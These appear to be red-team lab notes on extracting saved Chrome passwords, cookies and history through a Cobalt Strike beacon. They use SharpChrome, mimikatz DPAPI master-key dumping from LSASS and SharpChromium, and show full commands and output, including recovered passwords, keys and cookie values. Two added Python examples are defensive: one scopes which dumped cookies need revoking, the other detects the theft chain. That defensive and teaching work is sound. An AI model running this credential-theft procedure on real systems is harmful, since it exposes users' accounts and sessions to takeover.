Extracting logins/passwords, cookies and history data from browsers.
Some methods require local admin access.
Chrome encrypts saved passwords with an AES key that is itself protected by DPAPI (the output below shows both layers).
We will use SharpChrome to extract the details.
GitHub: https://github.com/GhostPack/SharpDPAPI (SharpChrome is part of SharpDPAPI)
Find sites with saved login details:
beacon> execute-assembly /opt/SharpCollection/NetFramework_4.0_Any/SharpChrome.exe logins
[*] Tasked beacon to run .NET program: SharpChrome.exe logins
[+] host called home, sent: 835127 bytes
[+] received output:
v1.9.2
[*] Action: Chrome Saved Logins Triage
[*] Triaging Chrome Logins for ALL users
[*] AES state key file : C:\Users\john\AppData\Local\Google\Chrome\User Data\Local State
[*] AES state key : MasterKey needed - {746fa65b-3590-4ef5-9c24-ef479ccec600}
--- Credential (Path: C:\Users\john\AppData\Local\Google\Chrome\User Data\Default\Login Data) ---
file_path,signon_realm,origin_url,date_created,times_used,username,password
C:\Users\john\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://10.128.0.30:8000/,http://10.128.0.30:8000/,3/26/2021 1:01:31 PM,13261237291289480,ryan,--AES STATE KEY NEEDED--
SharpChrome completed in 00:00:00.4569699
Extract the DPAPI master key matching the GUID reported above (sekurlsa::dpapi reads LSASS, so this step needs local admin):
beacon> mimikatz sekurlsa::dpapi
[*] Tasked beacon to run mimikatz's sekurlsa::dpapi command
[+] host called home, sent: 750721 bytes
[+] received output:
Authentication Id : 0 ; 6998111 (00000000:006ac85f)
Session : Interactive from 4
User Name : Administrator
Domain : EH
Logon Server : EHLAB-DC
Logon Time : 3/26/2021 11:29:02 AM
SID : S-1-5-21-2669240679-2768610461-1282890330-500
Authentication Id : 0 ; 5176335 (00000000:004efc0f)
Session : RemoteInteractive from 4
User Name : john
Domain : EH
Logon Server : EHLAB-DC
Logon Time : 3/26/2021 9:22:46 AM
SID : S-1-5-21-2669240679-2768610461-1282890330-1106
[00000000]
* GUID : {746fa65b-3590-4ef5-9c24-ef479ccec600}
* Time : 3/26/2021 11:26:54 AM
* MasterKey : 598246dbdc92bf08f075e13c30e6c1f68990e78fa869be10d9cb0e1c8f0947db79279eae0a76d153d77877abb44d1258bdc30997a37c55f63aa5a3cfe4ef1101
* sha1(key) : ab4e69c82cf98682805505384f1683bf475d9f10
Use the master key's SHA1 to decrypt the saved login details:
beacon> mimikatz dpapi::chrome /in:"C:\Users\john\AppData\Local\Google\Chrome\User Data\Default\Login Data" /masterkey:ab4e69c82cf98682805505384f1683bf475d9f10
[*] Tasked beacon to run mimikatz's dpapi::chrome /in:"C:\Users\john\AppData\Local\Google\Chrome\User Data\Default\Login Data" /masterkey:ab4e69c82cf98682805505384f1683bf475d9f10 command
[+] host called home, sent: 750191 bytes
[+] received output:
> Encrypted Key found in local state file
> Encrypted Key seems to be protected by DPAPI
* masterkey : ab4e69c82cf98682805505384f1683bf475d9f10
> AES Key is: 17228c756535118ee0e40a34ce32eaa1e5653c70ec60f98f9def0efa91351cfc
URL : http://10.128.0.30:8000/ ( http://10.128.0.30:8000/ )
Username: ryan
* using BCrypt with AES-256-GCM
Password: zX-7CMYG
Use the master key SHA1 to decrypt cookies (this run is from a different user profile, t.cobb, hence a different master key):
beacon> mimikatz dpapi::chrome /in:"C:\Users\t.cobb\AppData\Local\Google\Chrome\User Data\Default\Cookies" /masterkey:3772b1765c670951fff51d79ed5bdbc304b12d6c
[*] Tasked beacon to run mimikatz's dpapi::chrome /in:"C:\Users\t.cobb\AppData\Local\Google\Chrome\User Data\Default\Cookies" /masterkey:3772b1765c670951fff51d79ed5bdbc304b12d6c command
[+] host called home, sent: 750191 bytes
[+] received output:
> Encrypted Key found in local state file
> Encrypted Key seems to be protected by DPAPI
* masterkey : 3772b1765c670951fff51d79ed5bdbc304b12d6c
> AES Key is: 9b1b98e962f3a2b132eb6724153ebd9d399326ebee905453234237a3b08f0efd
Host : .google.com ( / )
Name : CONSENT
Dates : 20/03/2020 11:52:02 -> 01/01/2038 00:00:29
* using BCrypt with AES-256-GCM
Cookie: WP.284a63.284d17
Host : .google.com ( / )
Name : NID
Dates : 15/03/2020 16:34:19 -> 14/09/2020 16:34:19
* using BCrypt with AES-256-GCM
Cookie: 200=Rwsc9XI-Nx6EzYK_s5QF38_PpyInwJ6EofpA9tTAVLCtfAZtM7Nfw09etrMrqpYNmQPpaV4c51Zg2bOV-00IPc0VLr3lPmiv9zr7Tkl6MyVzsEPat2b1BPvx5l0elQcKIhLXSXqu6HKovo6CzJJzdi_GuPOiUraoV-vSwikD0NMF
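For incident-response scoping, the following is an added example (not part of the original notes and not mimikatz code) that parses this `dpapi::chrome` cookie-dump format and reports which cookies were still within their validity window at the time of capture, so the matching server-side sessions can be invalidated. The sample dump text, cookie values and the capture timestamp are constructed; only the length of each cookie value is retained, never the secret itself.

```python
import re
from datetime import datetime

# Constructed sample in the mimikatz dpapi::chrome cookie output format (values invented).
SAMPLE_DUMP = """\
Host : .google.com ( / )
Name : CONSENT
Dates : 20/03/2020 11:52:02 -> 01/01/2038 00:00:29
* using BCrypt with AES-256-GCM
Cookie: consent-value
Host : .google.com ( / )
Name : NID
Dates : 15/03/2020 16:34:19 -> 14/09/2020 16:34:19
* using BCrypt with AES-256-GCM
Cookie: nid-value
Host : intranet.example.local ( / )
Name : ASP.NET_SessionId
Dates : 25/03/2021 09:10:00 -> 26/03/2021 21:10:00
* using BCrypt with AES-256-GCM
Cookie: session-value
"""

# Assumed (constructed) time at which the beacon dumped the cookies.
CAPTURED_AT = datetime(2021, 3, 26, 11, 35, 0)

DATE_FMT = "%d/%m/%Y %H:%M:%S"  # mimikatz prints day/month/year in this output

# One cookie record: Host, Name, Dates (created -> expires), optional cipher note, Cookie value.
BLOCK = re.compile(
    r"Host\s*:\s*(?P<host>\S+)\s*\(\s*(?P<path>\S+)\s*\)\s*\n"
    r"Name\s*:\s*(?P<name>.+?)\s*\n"
    r"Dates\s*:\s*(?P<created>[\d/]+ [\d:]+)\s*->\s*(?P<expires>[\d/]+ [\d:]+)\s*\n"
    r"(?:\*.*\n)?"
    r"Cookie:\s*(?P<value>\S*)"
)


def parse_cookies(text):
    """Return one dict per cookie block; the secret value is reduced to its length."""
    cookies = []
    for m in BLOCK.finditer(text):
        cookies.append({
            "host": m["host"],
            "path": m["path"],
            "name": m["name"],
            "created": datetime.strptime(m["created"], DATE_FMT),
            "expires": datetime.strptime(m["expires"], DATE_FMT),
            "value_len": len(m["value"]),
        })
    return cookies


def live_at(cookies, when):
    """Cookies whose validity window contained the capture time: usable sessions."""
    return [c for c in cookies if c["created"] <= when <= c["expires"]]


def invalidation_report(text, captured_at):
    """Summarise which hosts had live cookies exposed, grouped for session revocation."""
    cookies = parse_cookies(text)
    live = live_at(cookies, captured_at)
    by_host = {}
    for c in live:
        by_host.setdefault(c["host"], []).append(c["name"])
    return {"total": len(cookies), "live": len(live), "by_host": by_host}


if __name__ == "__main__":
    report = invalidation_report(SAMPLE_DUMP, CAPTURED_AT)
    print(f"{report['live']} of {report['total']} dumped cookies were live at capture")
    for host, names in report["by_host"].items():
        print(f"  revoke sessions on {host}: {', '.join(names)}")
```

Expired cookies (NID in the sample) still reveal which sites the user visited but do not need revocation; a cookie with a far-future expiry such as CONSENT is low value, whereas a short-lived session cookie on an internal application is the one to kill first.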
Extract everything (history, cookies, saved credentials) from Chrome with SharpChromium:
beacon> execute-assembly /opt/SharpCollection/NetFramework_4.0_Any/SharpChromium.exe all
[*] Tasked beacon to run .NET program: SharpChromium.exe all
[+] host called home, sent: 612401 bytes
[+] received output:
[*] Beginning Google Chrome extraction.
[*] All cookies written to C:\Users\john\AppData\Local\Temp\4\google-chrome-cookies.json
[+] received output:
--- Chromium History (User: john) ---
URL : http://10.128.0.30:8000/
Title : No Title
Visit Count : 2
Cookies :
--- Chromium Credential (User: john) ---
URL : http://10.128.0.30:8000/action_page.php
Username : ryan
Password : zX-7CMYG
--- Chromium Credential (User: john) ---
URL : http://10.128.0.30:8000/action_page.php
Username : ryan2
Password : Password1!
[*] Finished Google Chrome extraction.
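From the detection side, the whole chain above leaves two distinctive footprints: a non-browser process reading Chrome's credential stores (Local State, Login Data, Cookies) under the profile's User Data directory, and a non-standard process opening LSASS (which is what sekurlsa::dpapi does to pull the master key). The following is an added example, not part of the original notes or of any of the tools mentioned, that correlates the two signals per host and user inside a time window. The event records are constructed and their field names only loosely follow Windows Security event 4663 (file object access, which requires a SACL on the browser profile) and Sysmon event 10 (process access); the allow-list of legitimate LSASS readers and the 30-minute window are assumptions to tune per environment.

```python
import ntpath
from datetime import datetime, timedelta

# Chrome credential stores; any process other than the browser reading them is suspect.
CHROME_STORES = ("Local State", "Login Data", "Cookies")
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe"}
# Assumed allow-list of processes that legitimately open LSASS (tune per environment).
LSASS_READERS_ALLOWED = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}
WINDOW = timedelta(minutes=30)  # assumed correlation window between the two stages

# Constructed sample telemetry (not real logs). "file_access" ~ event 4663, "process_access" ~ Sysmon 10.
EVENTS = [
    {"time": "2021-03-26 11:29:00", "host": "WS01", "user": "EH\\john", "event": "file_access",
     "process": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "object": "C:\\Users\\john\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"},
    {"time": "2021-03-26 11:30:10", "host": "WS01", "user": "EH\\john", "event": "file_access",
     "process": "C:\\Windows\\Temp\\update.exe",
     "object": "C:\\Users\\john\\AppData\\Local\\Google\\Chrome\\User Data\\Local State"},
    {"time": "2021-03-26 11:30:11", "host": "WS01", "user": "EH\\john", "event": "file_access",
     "process": "C:\\Windows\\Temp\\update.exe",
     "object": "C:\\Users\\john\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"},
    {"time": "2021-03-26 11:31:05", "host": "WS01", "user": "EH\\john", "event": "process_access",
     "process": "C:\\Windows\\Temp\\update.exe", "target": "C:\\Windows\\System32\\lsass.exe"},
    {"time": "2021-03-26 10:02:00", "host": "WS02", "user": "EH\\alice", "event": "file_access",
     "process": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "object": "C:\\Users\\alice\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"},
    {"time": "2021-03-26 10:05:00", "host": "WS03", "user": "EH\\bob", "event": "process_access",
     "process": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\MsMpEng.exe",
     "target": "C:\\Windows\\System32\\lsass.exe"},
    {"time": "2021-03-26 10:07:00", "host": "WS03", "user": "EH\\bob", "event": "file_access",
     "process": "C:\\Tools\\backup.exe",
     "object": "C:\\Users\\bob\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"},
]


def _base(path):
    return ntpath.basename(path).lower()


def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")


def is_browser_store_read(event):
    """Non-browser process touching a Chrome credential store under User Data."""
    if event["event"] != "file_access":
        return False
    obj = event["object"]
    if "\\User Data\\" not in obj or not obj.endswith(CHROME_STORES):
        return False
    return _base(event["process"]) not in BROWSER_IMAGES


def is_lsass_read(event):
    """Process opening LSASS that is not on the allow-list (master-key dumping stage)."""
    if event["event"] != "process_access" or _base(event["target"]) != "lsass.exe":
        return False
    return _base(event["process"]) not in LSASS_READERS_ALLOWED


def correlate(events):
    """Group suspicious hits per (host, user); both stages inside WINDOW => high-severity chain."""
    hits_by_key = {}
    for e in sorted(events, key=_ts):
        kind = "store" if is_browser_store_read(e) else "lsass" if is_lsass_read(e) else None
        if kind:
            hits_by_key.setdefault((e["host"], e["user"]), []).append((kind, e))
    findings = []
    for (host, user), hits in hits_by_key.items():
        kinds = {k for k, _ in hits}
        chain = False
        if kinds == {"store", "lsass"}:
            store_times = [_ts(e) for k, e in hits if k == "store"]
            lsass_times = [_ts(e) for k, e in hits if k == "lsass"]
            chain = any(abs(s - l) <= WINDOW for s in store_times for l in lsass_times)
        findings.append({
            "host": host, "user": user,
            "severity": "high" if chain else "medium",
            "rule": "browser_credential_theft_chain" if chain else "suspicious_" + "/".join(sorted(kinds)),
            "processes": sorted({_base(e["process"]) for _, e in hits}),
            "objects": sorted({e.get("object") or e.get("target") for _, e in hits}),
        })
    return findings


if __name__ == "__main__":
    for f in correlate(EVENTS):
        print(f"[{f['severity']}] {f['host']} {f['user']} {f['rule']} via {', '.join(f['processes'])}")
```

A single stage on its own (WS03 in the sample, where only the file read fires) is still worth a medium-severity finding, because the SharpChromium path above never touches LSASS when it runs in the user's own context; the LSASS stage is only required when the DPAPI master key has to be recovered for a different user or from a non-interactive session.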